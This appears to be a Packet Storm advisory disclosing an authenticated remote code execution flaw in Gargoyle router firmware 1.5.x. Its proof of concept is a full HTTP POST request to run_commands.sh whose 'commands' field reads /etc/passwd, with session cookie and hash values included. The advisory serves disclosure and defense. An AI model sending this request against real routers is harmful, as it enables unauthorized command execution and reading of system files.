Gargoyle routers version 1.5.x suffers from an authenticated remote code execution vulnerability.
ecbb41195177b9d9a6c2ccfa3cc768ae104f3e7a093d08cb8fb1c052aa17bf26# Affected software: Gargoyle router management utility
# Type of vulnerability:code execution
# URL:http://www.gargoyle-router.com/
# Discovered by: provensec
# Website: provensec.com
#version:1.5.X (Built 20140215-1506 git@505e8dc)
# Proof of concept
vulnerable paramter= "commands"'
POST /utility/run_commands.sh HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko/20100101
Firefox/38.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.1/time.sh
Cookie: browser_time=1433405406;
hash=090AB022C1B989478946468B2409B9FEF0916F2440A342AA07907CFA77B40C64;
exp=1433406276
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
Content-Type: multipart/form-data; boundary=--------108192589
Content-Length: 418
----------108192589
Content-Disposition: form-data; name="commands"
*cat/etc/passwd*
----------108192589
Content-Disposition: form-data; name="hash"
090AB022C1B989478946468B2409B9FEF0916F2440A342AA07907CFA77B40C64
----------108192589--
##screenshot for output: http://prntscr.com/7ckcqd
and yes it requires authentiction
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed